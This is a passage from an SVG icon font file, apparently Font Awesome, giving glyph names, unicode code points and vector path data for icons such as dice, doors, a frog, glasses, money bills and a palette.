c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32s-32 -14.3301 -32 -32s14.3301 -32 32 -32zM320 64c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32s-32 -14.3301 -32 -32s14.3301 -32 32 -32zM320 256c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32
s-32 -14.3301 -32 -32s14.3301 -32 32 -32z" />
    <glyph glyph-name="dice-one" unicode="&#xf525;" horiz-adv-x="448" 
d="M384 416c35.3496 0 64 -28.6504 64 -64v-320c0 -35.3496 -28.6504 -64 -64 -64h-320c-35.3496 0 -64 28.6504 -64 64v320c0 35.3496 28.6504 64 64 64h320zM224 160c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32s-32 -14.3301 -32 -32s14.3301 -32 32 -32z" />
    <glyph glyph-name="dice-six" unicode="&#xf526;" horiz-adv-x="448" 
d="M384 416c35.3496 0 64 -28.6504 64 -64v-320c0 -35.3496 -28.6504 -64 -64 -64h-320c-35.3496 0 -64 28.6504 -64 64v320c0 35.3496 28.6504 64 64 64h320zM128 64c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32s-32 -14.3301 -32 -32s14.3301 -32 32 -32zM128 160
c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32s-32 -14.3301 -32 -32s14.3301 -32 32 -32zM128 256c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32s-32 -14.3301 -32 -32s14.3301 -32 32 -32zM320 64c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32
s-32 -14.3301 -32 -32s14.3301 -32 32 -32zM320 160c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32s-32 -14.3301 -32 -32s14.3301 -32 32 -32zM320 256c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32s-32 -14.3301 -32 -32s14.3301 -32 32 -32z" />
    <glyph glyph-name="dice-three" unicode="&#xf527;" horiz-adv-x="448" 
d="M384 416c35.3496 0 64 -28.6504 64 -64v-320c0 -35.3496 -28.6504 -64 -64 -64h-320c-35.3496 0 -64 28.6504 -64 64v320c0 35.3496 28.6504 64 64 64h320zM128 256c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32s-32 -14.3301 -32 -32s14.3301 -32 32 -32zM224 160
c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32s-32 -14.3301 -32 -32s14.3301 -32 32 -32zM320 64c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32s-32 -14.3301 -32 -32s14.3301 -32 32 -32z" />
    <glyph glyph-name="dice-two" unicode="&#xf528;" horiz-adv-x="448" 
d="M384 416c35.3496 0 64 -28.6504 64 -64v-320c0 -35.3496 -28.6504 -64 -64 -64h-320c-35.3496 0 -64 28.6504 -64 64v320c0 35.3496 28.6504 64 64 64h320zM128 256c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32s-32 -14.3301 -32 -32s14.3301 -32 32 -32zM320 64
c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32s-32 -14.3301 -32 -32s14.3301 -32 32 -32z" />
    <glyph glyph-name="divide" unicode="&#xf529;" horiz-adv-x="448" 
d="M224 96c35.3496 0 64 -28.6504 64 -64s-28.6504 -64 -64 -64s-64 28.6504 -64 64s28.6504 64 64 64zM224 288c-35.3496 0 -64 28.6504 -64 64s28.6504 64 64 64s64 -28.6504 64 -64s-28.6504 -64 -64 -64zM416 240c17.6699 0 32 -14.3301 32 -32v-32
c0 -17.6699 -14.3301 -32 -32 -32h-384c-17.6699 0 -32 14.3301 -32 32v32c0 17.6699 14.3301 32 32 32h384z" />
    <glyph glyph-name="door-closed" unicode="&#xf52a;" horiz-adv-x="640" 
d="M624 0c8.83984 0 16 -7.16016 16 -16v-32c0 -8.83984 -7.16016 -16 -16 -16h-608c-8.83984 0 -16 7.16016 -16 16v32c0 8.83984 7.16016 16 16 16h111.99v397.2c0 28.0195 21.5293 50.7998 48 50.7998h288.01c26.4697 0 48 -22.7803 48 -50.7998v-397.2h112zM415.99 160
c17.6797 0 32.0098 14.3301 32 32c0 17.6699 -14.3301 32 -32 32s-32 -14.3301 -32 -32s14.3301 -32 32 -32z" />
    <glyph glyph-name="door-open" unicode="&#xf52b;" horiz-adv-x="640" 
d="M624 0c8.83984 0 16 -7.16016 16 -16v-32c0 -8.83984 -7.16016 -16 -16 -16h-144v384h-96v64h112c26.4697 0 48 -22.1904 48 -49.4502v-334.55h80zM312.24 446.99c20.2002 5.24023 39.7598 -10.5898 39.7598 -32.1699v-478.82h-336c-8.83984 0 -16 7.16016 -16 16v32
c0 8.83984 7.16016 16 16 16h80v365.08c0 15.2197 9.99023 28.4795 24.2402 32.1699zM264 160c13.25 0 24 14.3301 24 32s-10.75 32 -24 32s-24 -14.3301 -24 -32s10.75 -32 24 -32z" />
    <glyph glyph-name="equals" unicode="&#xf52c;" horiz-adv-x="448" 
d="M416 144c17.6699 0 32 -14.3301 32 -32v-32c0 -17.6699 -14.3301 -32 -32 -32h-384c-17.6699 0 -32 14.3301 -32 32v32c0 17.6699 14.3301 32 32 32h384zM416 336c17.6699 0 32 -14.3301 32 -32v-32c0 -17.6699 -14.3301 -32 -32 -32h-384c-17.6699 0 -32 14.3301 -32 32
v32c0 17.6699 14.3301 32 32 32h384z" />
    <glyph glyph-name="feather" unicode="&#xf52d;" 
d="M467.14 403.16c50.5703 -50.5205 61.7002 -124.9 16.2607 -199.36l-131.54 -43.7998h97.7793c-9.92969 -10.6797 3.68066 3.07031 -46.3096 -46.8604l-147.57 -49.1396h98.1904c-74.9502 -73.1104 -194.53 -70.6504 -246.83 -54.9404l-66.1006 -66.0293
c-9.37988 -9.37012 -24.5996 -9.37012 -33.9795 0s-9.37988 24.5693 0 33.9395l259.52 259.25c6.25 6.25 6.25 16.3799 0 22.6299s-16.3896 6.25 -22.6494 0l-178.44 -178.25c-6.75 60.3408 3.18066 150.78 63.6406 211.17c24.7695 24.7402 7.13965 7.14062 85.75 85.6602
c90.6094 90.5107 189.729 88.21 252.279 25.7305z" />
    <glyph glyph-name="frog" unicode="&#xf52e;" horiz-adv-x="576" 
d="M446.53 350.57c0 0 58.4297 -19.0605 98.9893 -41.2803c18.7607 -10.2803 30.4805 -29.8301 30.4805 -51.2305v-0.00292969c0 -18.8037 -13.3105 -41.5283 -29.71 -50.7266l-154.44 -86.6504l98.5205 -104.68h53.6299c17.6699 0 32 -14.3301 32 -32
c0 -8.83984 -7.16016 -16 -16 -16h-90.3799l-118.53 125.94c5.07031 54.1494 -29.9297 85.0596 -40.7998 93.21c-36.8496 27.6191 -88.29 27.6592 -125.13 0l-34.7803 -26.0908c-7.07031 -5.2998 -8.49023 -15.3291 -3.18945 -22.4092
c5.31934 -7.10059 15.3496 -8.5 22.4092 -3.19043l32.7607 24.5898c20.6895 15.5303 48.3496 20.8105 72.2393 10.8799c44.0605 -18.3193 57.8506 -70.3701 33.71 -106.6l-35.7998 -48.3301h79.4902c17.6699 0 32 -14.3301 32 -32c0 -8.83984 -7.16016 -16 -16 -16h-304
c-34.9199 0 -63.8896 28.0996 -64 63.0195c-0.5 166.86 126.75 304.021 289.46 319.44c6.82031 37.25 39.3096 65.54 78.54 65.54c39.1904 0 71.6699 -28.2305 78.5303 -65.4297zM368 312c13.25 0 24 10.75 24 24c0 13.2598 -10.75 24 -24 24
c-13.2598 0 -24 -10.7402 -24 -24c0 -13.25 10.7402 -24 24 -24z" />
    <glyph glyph-name="gas-pump" unicode="&#xf52f;" 
d="M336 0c8.7998 0 16 -7.2002 16 -16v-32c0 -8.7998 -7.2002 -16 -16 -16h-320c-8.7998 0 -16 7.2002 -16 16v32c0 8.7998 7.2002 16 16 16h320zM493.2 340.7c12 -12 18.7998 -28.2998 18.7998 -45.2998v-223.4c0 -42.2002 -36.5 -76 -79.5 -71.7002
c-37.5 3.90039 -64.5 38.2002 -64.5 75.9004v27.7998c0 22.0996 -17.9004 40 -40 40h-8v-112h-288v352c0 35.2998 28.7002 64 64 64h160c35.2998 0 64 -28.7002 64 -64v-192h8c48.5996 0 88 -39.4004 88 -88v-32c0 -13.2002 10.7998 -24 24 -24s24 10.7998 24 24v160.8
c-27.0996 3.90039 -48 27.1006 -48 55.2002v62.0996l-37.7002 37.7002c-6.2002 6.2002 -6.2002 16.4004 0 22.6006l11.2998 11.2998c6.2002 6.2002 16.4004 6.2002 22.6006 0zM256 256v128h-160v-128h160z" />
    <glyph glyph-name="glasses" unicode="&#xf530;" horiz-adv-x="576" 
d="M574.1 167.63c1.26074 -5.07031 1.90039 -10.2695 1.90039 -15.5v-70.25c0 -62.8896 -51.5801 -113.88 -115.2 -113.88h-37.1201c-60.2793 0 -110.37 45.9404 -114.87 105.37l-2.92969 38.6299h-35.75l-2.92969 -38.6299
c-4.50977 -59.4297 -54.6006 -105.37 -114.88 -105.37h-37.1201c-63.6201 0 -115.2 50.9902 -115.2 113.89v70.25c0.000976562 4.33984 0.852539 11.2793 1.90039 15.4902l45.3398 181.73c5.91016 23.6895 21.5898 44.0293 43 55.7998
c21.4395 11.7402 46.9697 14.1094 70.1895 6.33008l15.25 -5.08008c8.39062 -2.79004 12.9199 -11.8604 10.1201 -20.2402l-5.05957 -15.1797c-2.79004 -8.37988 -11.8506 -12.9102 -20.2305 -10.1201l-13.1699 4.38965
c-10.8701 3.62012 -22.9902 3.57031 -33.1494 -1.72949c-10.29 -5.36035 -17.5908 -14.5605 -20.3809 -25.8105l-38.46 -153.83c22.1904 6.81055 49.79 12.46 81.21 12.46c34.7803 0 73.9902 -7.00977 114.86 -26.75h73.1797
c40.8701 19.7207 80.0801 26.7402 114.851 26.7402c31.4102 0 59.0098 -5.64941 81.2002 -12.46l-38.46 153.82c-2.80078 11.2598 -10.0801 20.4502 -20.3701 25.8193c-10.1602 5.30078 -22.29 5.35059 -33.1602 1.73047l-13.1797 -4.38965
c-8.38086 -2.79004 -17.4404 1.73926 -20.2305 10.1201l-5.05957 15.1797c-2.80078 8.37988 1.72949 17.4502 10.1191 20.2402l15.25 5.08008c23.2207 7.7793 48.75 5.39941 70.1904 -6.33008c21.4102 -11.7607 37.0898 -32.1104 43 -55.8105zM203.38 78.21l3.12988 41.2197
c-22.6699 8.58984 -46.0693 12.9199 -69.9297 12.9199c-29.1602 0 -54.46 -6.42969 -72.5801 -12.9199v-37.54c0 -27.5098 22.9697 -49.8896 51.2002 -49.8896h37.1201c26.6602 0 49.0898 20.2998 51.0596 46.21zM512 81.8799l-0.00976562 37.54
c-18.1201 6.49023 -43.4307 12.9297 -72.5498 12.9297c-23.8701 0 -47.2803 -4.33008 -69.9502 -12.9199l3.12988 -41.2197c1.95996 -25.9102 24.3896 -46.21 51.0596 -46.21h37.1201c28.2305 0 51.2002 22.3701 51.2002 49.8799z" />
    <glyph glyph-name="greater-than" unicode="&#xf531;" horiz-adv-x="384" 
d="M365.52 238.15c11.2803 -5.25 18.4805 -16.5605 18.4902 -29.0107v-34.2295c-0.00195312 -11.2529 -8.28027 -24.2451 -18.4795 -29l-306.471 -142.91c-16.0195 -7.46973 -35.0596 -0.540039 -42.5293 15.4805l-13.5205 29
c-7.46973 16.0195 -0.540039 35.0596 15.4805 42.5293l218.47 101.891l-218.43 101.85c-16.0605 7.49023 -23.0107 26.5801 -15.5205 42.6396l13.5703 29.0801c7.49023 16.0605 26.5801 23.0107 42.6396 15.5205z" />
    <glyph glyph-name="greater-than-equal" unicode="&#xf532;" horiz-adv-x="448" 
d="M55.2197 340.31c-18.29 6 -27.7393 24.2607 -21.0996 40.79l12.0303 29.9199c6.63965 16.5303 26.8594 25.0605 45.1494 19.0605l301.72 -119.98c13.7705 -4.51953 22.9805 -16.6094 22.9805 -30.1699v-15.96c0 -13.5596 -9.20996 -25.6494 -22.9805 -30.1699
l-301.409 -119.859c-18.3906 -6.04004 -38.7002 2.54004 -45.3799 19.1494l-12.0908 30.0801c-6.67969 16.6104 2.81055 34.9697 21.2002 41l175.44 68.0498zM424 48c13.25 0 24 -10.7402 24 -24v-48c0 -13.25 -10.75 -24 -24 -24h-400c-13.25 0 -24 10.75 -24 24v48
c0 13.2598 10.75 24 24 24h400z" />
    <glyph glyph-name="helicopter" unicode="&#xf533;" horiz-adv-x="640" 
d="M304 64c-8.83105 0 -20.3018 5.73438 -25.5996 12.7998l-86.4004 115.2l-160 64l-31.5098 108.12c-2.53027 10.0996 5.10938 19.8799 15.5195 19.8799h39.9902c5.03027 0 9.78027 -2.37012 12.7998 -6.40039l43.2002 -57.5996h208v64h-176c-8.83984 0 -16 7.16016 -16 16
v32c0 8.83984 7.16016 16 16 16h416c8.83984 0 16 -7.16016 16 -16v-32c0 -8.83984 -7.16016 -16 -16 -16h-176v-64c123.71 0 224 -100.29 224 -224c0 -17.6699 -14.3301 -32 -32 -32h-272zM416 252.49v-124.49h124.79c-12.7598 62.5596 -62.2402 111.7 -124.79 124.49z
M635.37 -10.8096c6.58984 -6.61035 6.04004 -17.5205 -0.980469 -23.6602c-33.1494 -29.0498 -53.5693 -29.5205 -68.4492 -29.5205h-325.94c-8.83984 0 -16 7.18066 -16 16.0303v32.0596c0 8.85059 7.16016 16.0303 16 16.0303h325.94
c10.7998 0 17.5498 4.48047 24.6396 11.25c6.40039 6.11035 16.3896 6.27051 22.6396 0.00976562z" />
    <glyph glyph-name="infinity" unicode="&#xf534;" horiz-adv-x="640" 
d="M471.1 352c93.1006 0 168.9 -71.7998 168.9 -160s-75.7998 -160 -168.9 -160c-66.0996 0 -117.8 41.2998 -151.1 78.5996c-33.2998 -37.2998 -85 -78.5996 -151.1 -78.5996c-93.1006 0 -168.9 71.7998 -168.9 160s75.7998 160 168.9 160
c66.0996 0 117.8 -41.2998 151.1 -78.5996c33.2998 37.2998 85 78.5996 151.1 78.5996zM168.9 128c38.0996 0 73.5996 36.4004 94 64c-20.6006 27.9004 -55.8008 64 -94 64c-40.2002 0 -72.9004 -28.7002 -72.9004 -64s32.7002 -64 72.9004 -64zM471.1 128
c40.2002 0 72.9004 28.7002 72.9004 64s-32.7002 64 -72.9004 64c-38.0996 0 -73.5996 -36.4004 -94 -64c20.6006 -27.9004 55.8008 -64 94 -64z" />
    <glyph glyph-name="kiwi-bird" unicode="&#xf535;" horiz-adv-x="576" 
d="M575.81 230.02c0.300781 -5.7793 0.160156 -246.02 0.160156 -246.02c0 -7.30957 -4.95996 -13.7002 -12.0498 -15.5c-1.30957 -0.339844 -2.63965 -0.5 -3.9502 -0.5c-5.75 0 -11.1895 3.11035 -14.0498 8.33984l-74.4102 136.44
c-7.04004 -0.470703 2.43066 -0.780273 -23.0498 -0.780273c-54.5996 0 -106.39 -19.25 -152.13 -49.0596c-12.46 -8.12012 -26.0996 -14.4502 -40.3398 -19.5107v-59.4297c0 -8.83984 -7.16016 -16 -16 -16h-16c-8.83984 0 -16 7.16016 -16 16v49.1797
c-5.32031 -0.449219 -10.5605 -1.17969 -16 -1.17969c-16.6006 0 -32.6406 2.2998 -48 6.25977v-54.2598c0 -8.83984 -7.16016 -16 -16 -16h-16c-8.83984 0 -16 7.16016 -16 16v73.9902c-57.3105 33.21 -95.9502 95.0596 -95.9902 166.01
c-0.0800781 145.76 129.3 182.88 147.31 186.94c57.1709 12.9199 111.221 0.259766 153.21 -28.7002c43.4902 -29.9902 94.9209 -46.2402 147.74 -46.2402h9.37012c60.6504 0 115.01 -45.4102 118.18 -105.98zM463.97 200c13.25 0 24 10.75 24 24
c0 13.2598 -10.75 24 -24 24s-24 -10.7402 -24 -24c0 -13.25 10.75 -24 24 -24zM543.97 46.75v99.0596c-11.1299 -11.3799 -24.7393 -20.1494 -39.8594 -25.9795z" />
    <glyph glyph-name="less-than" unicode="&#xf536;" horiz-adv-x="384" 
d="M365.46 90.2598c16.0703 -7.49023 23.0205 -26.5801 15.5303 -42.6396l-13.5605 -29.0801c-7.48926 -16.0596 -26.5801 -23.0098 -42.6396 -15.5205l-306.31 142.83c-11.2705 5.25 -18.4805 16.5605 -18.4805 29v34.2402c0.00488281 11.252 8.2832 24.2432 18.4805 29
l306.46 142.91c16.0195 7.46973 35.0596 0.540039 42.5293 -15.4805l13.5205 -29c7.46973 -16.0195 0.540039 -35.0596 -15.4805 -42.5293l-218.47 -101.88z" />
    <glyph glyph-name="less-than-equal" unicode="&#xf537;" horiz-adv-x="448" 
d="M54.9805 233.8c-13.7705 4.52051 -22.9805 16.6104 -22.9805 30.1699v15.96c0 13.5703 9.20996 25.6602 22.9805 30.1807l301.71 119.96c18.29 6 38.5098 -2.53027 45.1494 -19.0605l12.0303 -29.9199c6.63965 -16.5195 -2.81055 -34.79 -21.1006 -40.79
l-175.56 -68.0898l175.44 -68.0498c18.3896 -6.03027 27.8896 -24.3906 21.21 -41l-12.0908 -30.0801c-6.66992 -16.6104 -26.9893 -25.1797 -45.3799 -19.1504zM424 48c13.25 0 24 -10.7402 24 -24v-48c0 -13.25 -10.75 -24 -24 -24h-400c-13.25 0 -24 10.75 -24 24v48
c0 13.2598 10.75 24 24 24h400z" />
    <glyph glyph-name="memory" unicode="&#xf538;" horiz-adv-x="640" 
d="M640 317.06c-18.5996 -6.60938 -32 -24.1895 -32 -45.0596s13.4004 -38.4502 32 -45.0596v-98.9404h-640v98.9404c18.5996 6.60938 32 24.1895 32 45.0596s-13.4004 38.4502 -32 45.0596v34.9404c0 17.6699 14.3301 32 32 32h576c17.6699 0 32 -14.3301 32 -32v-34.9404z
M224 192v128h-64v-128h64zM352 192v128h-64v-128h64zM480 192v128h-64v-128h64zM0 0v96h640v-96h-64v26.6699c0 8.83984 -7.16016 16 -16 16s-16 -7.16016 -16 -16v-26.6699h-128v26.6699c0 8.83984 -7.16016 16 -16 16s-16 -7.16016 -16 -16v-26.6699h-128v26.6699
c0 8.83984 -7.16016 16 -16 16s-16 -7.16016 -16 -16v-26.6699h-128v26.6699c0 8.83984 -7.16016 16 -16 16s-16 -7.16016 -16 -16v-26.6699h-64z" />
    <glyph glyph-name="microphone-alt-slash" unicode="&#xf539;" horiz-adv-x="640" 
d="M633.82 -10.0996c6.97949 -5.43066 8.22949 -15.4805 2.81934 -22.4502l-19.6396 -25.2705c-5.42969 -6.97949 -15.4805 -8.23926 -22.46 -2.80957l-588.36 454.729c-6.97949 5.43066 -8.22949 15.4805 -2.80957 22.4502l19.6396 25.2705
c5.41992 6.97949 15.4805 8.22949 22.46 2.80957l178.53 -138v45.3604c0 53.0195 42.9805 96 96 96s96 -42.9805 96 -96h-85.3301c-5.88965 0 -10.6699 -3.58008 -10.6699 -8v-16c0 -4.41992 4.78027 -8 10.6699 -8h85.3301v-32h-85.3301
c-5.88965 0 -10.6699 -3.58008 -10.6699 -8v-16c0 -4.41992 4.78027 -8 10.6699 -8h85.3301v-32h-85.0596l41.3994 -32h43.6699c0 -10.4502 -2.17969 -20.2705 -5.2793 -29.6699l26.5498 -20.5205c6.75977 15.4004 10.7197 32.2803 10.7197 50.2002v48
c0 8.83984 7.16016 16 16 16h16c8.83984 0 16 -7.16016 16 -16v-48c0 -28.9805 -7.25977 -56.21 -19.7402 -80.3301zM400 -16c8.83984 0 16 -7.16016 16 -16v-16c0 -8.83984 -7.16016 -16 -16 -16h-160c-8.83984 0 -16 7.16016 -16 16v16c0 8.83984 7.16016 16 16 16h56
v34.1504c-88.0303 12.1396 -152 92.0498 -152 181.689v6.85059l52.0303 -40.2207c12.4395 -53.2197 55.3301 -96.3994 111.18 -101.85c6.94043 -0.669922 13.6396 -0.200195 20.3496 0.200195l50.4004 -38.96c-10.8604 -3.80078 -22.25 -6.45996 -33.96 -8.08008v-33.7803
h56z" />
    <glyph glyph-name="money-bill-wave" unicode="&#xf53a;" horiz-adv-x="640" 
d="M621.16 393.54c11.6094 -4.87012 18.8398 -16.8301 18.8496 -29.4697v-317.25c0 -18.4902 -15.04 -31.8105 -32.25 -31.8105c-3.39941 0 -6.87988 0.520508 -10.3496 1.62012c-30.8906 9.7998 -61.7598 13.7197 -92.6504 13.7197
c-123.17 0 -246.34 -62.3496 -369.51 -62.3496c-38.7998 0 -77.6201 6.19043 -116.41 22.4697c-11.6094 4.86035 -18.8398 16.8301 -18.8398 29.46v317.261c0 18.4893 15.04 31.8096 32.25 31.8096c3.40039 0 6.87988 -0.519531 10.3496 -1.62012
c30.8906 -9.7998 61.7607 -13.7197 92.6504 -13.7197c123.17 0 246.33 62.3496 369.5 62.3398c38.7998 0 77.6201 -6.19043 116.41 -22.46zM48 315.78v-60.4707c31 0 56.8398 22.1504 62.7197 51.54c-21.5996 1.36035 -42.5996 3.89062 -62.7197 8.93066zM48 30.7803
c20.1201 -7.31055 41.1797 -11.8105 63.71 -13.6201c-1.53027 34.1299 -29.3398 61.3994 -63.71 61.3994v-47.7793zM320 96c44.1699 0 80 42.9697 80 96c0 53.0195 -35.8203 96 -80 96s-80 -42.9805 -80 -96c0 -53.0098 35.8096 -96 80 -96zM592 68.2197v57.7207
c-26.8203 -3.40039 -48.4502 -23.2002 -54.3203 -49.2803c18.6104 -1.58984 36.8008 -4.0498 54.3203 -8.44043zM592 304.33v48.8896c-17.7197 6.43066 -36.2695 10.4902 -55.8096 12.6602c0.949219 -31.8496 24.9199 -57.6396 55.8096 -61.5498z" />
    <glyph glyph-name="money-bill-wave-alt" unicode="&#xf53b;" horiz-adv-x="640" 
d="M621.16 393.54c11.6094 -4.87012 18.8398 -16.8301 18.8496 -29.4697v-317.25c0 -18.4902 -15.04 -31.8105 -32.25 -31.8105c-3.39941 0 -6.87988 0.520508 -10.3496 1.62012c-30.8906 9.7998 -61.7598 13.7197 -92.6504 13.7197
c-123.17 0 -246.34 -62.3496 -369.51 -62.3496c-38.7998 0 -77.6201 6.19043 -116.41 22.4697c-11.6094 4.86035 -18.8398 16.8301 -18.8398 29.46v317.261c0 18.4893 15.04 31.8096 32.25 31.8096c3.40039 0 6.87988 -0.519531 10.3496 -1.62012
c30.8906 -9.7998 61.7607 -13.7197 92.6504 -13.7197c123.17 0 246.33 62.3496 369.5 62.3398c38.7998 0 77.6201 -6.19043 116.41 -22.46zM320 96c44.1699 0 80 42.9697 80 96c0 53.0195 -35.8203 96 -80 96s-80 -42.9805 -80 -96c0 -53.0098 35.8096 -96 80 -96z" />
    <glyph glyph-name="money-check" unicode="&#xf53c;" horiz-adv-x="640" 
d="M0 0v320h640v-320c0 -17.6699 -14.3301 -32 -32 -32h-576c-17.6699 0 -32 14.3301 -32 32zM448 208v-32c0 -8.83984 7.16016 -16 16 -16h96c8.83984 0 16 7.16016 16 16v32c0 8.83984 -7.16016 16 -16 16h-96c-8.83984 0 -16 -7.16016 -16 -16zM448 88v-16
c0 -4.41992 3.58008 -8 8 -8h112c4.41992 0 8 3.58008 8 8v16c0 4.41992 -3.58008 8 -8 8h-112c-4.41992 0 -8 -3.58008 -8 -8zM64 184v-16c0 -4.41992 3.58008 -8 8 -8h304c4.41992 0 8 3.58008 8 8v16c0 4.41992 -3.58008 8 -8 8h-304c-4.41992 0 -8 -3.58008 -8 -8z
M64 88v-16c0 -4.41992 3.58008 -8 8 -8h176c4.41992 0 8 3.58008 8 8v16c0 4.41992 -3.58008 8 -8 8h-176c-4.41992 0 -8 -3.58008 -8 -8zM624 416c8.83984 0 16 -7.16016 16 -16v-48h-640v48c0 8.83984 7.16016 16 16 16h608z" />
    <glyph glyph-name="money-check-alt" unicode="&#xf53d;" horiz-adv-x="640" 
d="M608 416c17.6699 0 32 -14.3301 32 -32v-384c0 -17.6699 -14.3301 -32 -32 -32h-576c-17.6699 0 -32 14.3301 -32 32v384c0 17.6699 14.3301 32 32 32h576zM176 120.12c23.6201 0.629883 42.6699 20.54 42.6699 45.0703c0 19.9697 -12.9902 37.8096 -31.5801 43.3896
l-45 13.5c-5.16016 1.54004 -8.76953 6.78027 -8.76953 12.7295c0 7.27051 5.2998 13.1904 11.7998 13.1904h28.1104c4.55957 0 8.94922 -1.29004 12.8193 -3.71973c3.24023 -2.03027 7.36035 -1.91016 10.1299 0.729492l11.75 11.21
c3.53027 3.37012 3.33008 9.20996 -0.569336 12.1406c-9.10059 6.83984 -20.0801 10.7695 -31.3701 11.3496v16.29c0 4.41992 -3.58008 8 -8 8h-16c-4.41992 0 -8 -3.58008 -8 -8v-16.1201c-23.6201 -0.629883 -42.6699 -20.5498 -42.6699 -45.0703
c0 -19.9697 12.9893 -37.8096 31.5801 -43.3896l45 -13.5c5.15918 -1.54004 8.76953 -6.78027 8.76953 -12.7295c0 -7.27051 -5.2998 -13.1904 -11.7998 -13.1904h-28.1104c-4.55957 0 -8.9502 1.2998 -12.8193 3.71973
c-3.24023 2.03027 -7.36035 1.91016 -10.1309 -0.729492l-11.75 -11.21c-3.5293 -3.37012 -3.3291 -9.20996 0.570312 -12.1406c9.10059 -6.83008 20.0801 -10.7695 31.3701 -11.3496v-16.29c0 -4.41992 3.58008 -8 8 -8h16c4.41992 0 8 3.58008 8 8v16.1201zM416 136v16
c0 4.41992 -3.58008 8 -8 8h-112c-4.41992 0 -8 -3.58008 -8 -8v-16c0 -4.41992 3.58008 -8 8 -8h112c4.41992 0 8 3.58008 8 8zM576 136v16c0 4.41992 -3.58008 8 -8 8h-80c-4.41992 0 -8 -3.58008 -8 -8v-16c0 -4.41992 3.58008 -8 8 -8h80c4.41992 0 8 3.58008 8 8z
M576 232v16c0 4.41992 -3.58008 8 -8 8h-272c-4.41992 0 -8 -3.58008 -8 -8v-16c0 -4.41992 3.58008 -8 8 -8h272c4.41992 0 8 3.58008 8 8z" />
    <glyph glyph-name="not-equal" unicode="&#xf53e;" horiz-adv-x="448" 
d="M416 240h-98.4199l-74.5303 -96h172.95c17.6699 0 32 -14.3301 32 -32v-32c0 -17.6699 -14.3301 -32 -32 -32h-247.48l-82.0898 -105.73c-5.37012 -7.00977 -15.4102 -8.34961 -22.4297 -2.96973l-25.4102 19.46c-7.00977 5.37988 -8.33984 15.4199 -2.96973 22.4307
l51.8701 66.8096h-55.4902c-17.6699 0 -32 14.3301 -32 32v32c0 17.6699 14.3301 32 32 32h130.03l74.5293 96h-204.56c-17.6699 0 -32 14.3301 -32 32v32c0 17.6699 14.3301 32 32 32h279.09l82.0801 105.73c5.37988 7.00977 15.4199 8.34961 22.4404 2.96973
l25.4092 -19.46c7.01074 -5.37012 8.34082 -15.4102 2.9707 -22.4307l-51.8701 -66.8096h23.8799c17.6699 0 32 -14.3301 32 -32v-32c0 -17.6699 -14.3301 -32 -32 -32z" />
    <glyph glyph-name="palette" unicode="&#xf53f;" 
d="M204.3 443c163.8 31.9004 307.2 -92.0996 307.7 -249.7c-0.0996094 -35.7002 -29.0996 -65.2998 -64.9004 -65.2998h-79.6992c-51 0 -84 -53 -60.9004 -98.4004c18.9004 -37.0996 -1.2998 -85.2998 -42.5 -91.6992c-127.1 -19.7002 -295.8 119.699 -258.8 306.699
c19.5996 99.1006 99.7002 179 199.1 198.4zM96 128c17.7002 0 32 14.2998 32 32s-14.2998 32 -32 32s-32 -14.2998 -32 -32s14.2998 -32 32 -32zM128 256c17.7002 0 32 14.2998 32 32s-14.2998 32 -32 32s-32 -14.2998 -32 -32s14.2998 -32 32 -32zM256 320
c17.7002 0 32 14.2998 32 32s-14.2998 32 -32 32s-32 -14.2998 -32 -32s14.2998 -32 32 -32zM384 256c17.7002 0 32 14.2998 32 32s-14.2998 32 -32 32s-32 -14.2998 -32 -32s14.2998 -32 32 -32z" />
    <glyph glyph-name="parking" unicode="&#xf540;" horiz-adv-x="448" 
d="M400 416c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h352zM240 128c52.9004 0 96 43.0996 96 96s-43.0996 96 -96 96h-96c-8.7998 0 -16 -7.2002 -16 -16v-224c0 -8.7998 7.2002 -16 16 -16h32
c8.7998 0 16 7.2002 16 16v48h48zM240 256c17.5996 0 32 -14.4004 32 -32s-14.4004 -32 -32 -32h-48v64h48z" />
    <glyph glyph-name="percentage" unicode="&#xf541;" horiz-adv-x="384" 
d="M109.25 274.75c-24.9902 -25 -65.5098 -25 -90.5098 0c-24.9902 24.9902 -24.9902 65.5195 0 90.5098s65.5195 24.9902 90.5098 0s24.9902 -65.5195 0 -90.5098zM365.25 109.26c25 -25 25 -65.5195 0 -90.5098c-24.9902 -24.9902 -65.5195 -24.9902 -90.5098 0
s-24.9902 65.5195 0 90.5098s65.5195 24.9902 90.5098 0zM363.31 340.69c12.5 -12.5 12.5 -32.7607 0 -45.25l-274.75 -274.75c-12.4893 -12.5 -32.75 -12.5 -45.25 0l-22.6191 22.6191c-12.5 12.4902 -12.5 32.75 0 45.25l274.75 274.75c12.4893 12.5 32.75 12.5 45.25 0z
" />
    <glyph glyph-name="project-diagram" unicode="&#xf542;" horiz-adv-x="640" 
d="M384 128c17.6699 0 32 -14.3301 32 -32v-128c0 -17.6699 -14.3301 -32 -32 -32h-128c-17.6699 0 -32 14.3301 -32 32v128c0 17.6699 14.3301 32 32 32h128zM192 416v-32h224v-64h-224v-47.5098l64.2803 -112.49h-0.280273c-23.5996 0 -44.0195 -12.9805 -55.1201 -32.04
l-73.1602 128.04h-95.7197c-17.6699 0 -32 14.3301 -32 32v128c0 17.6699 14.3301 32 32 32h128c17.6699 0 32 -14.3301 32 -32zM608 448c17.6699 0 32 -14.3301 32 -32v-128c0 -17.6699 -14.3301 -32 -32 -32h-128c-17.6699 0 -32 14.3301 -32 32v128
c0 17.6699 14.3301 32 32 32h128z" />
    <glyph glyph-name="receipt" unicode="&#xf543;" horiz-adv-x="384" 
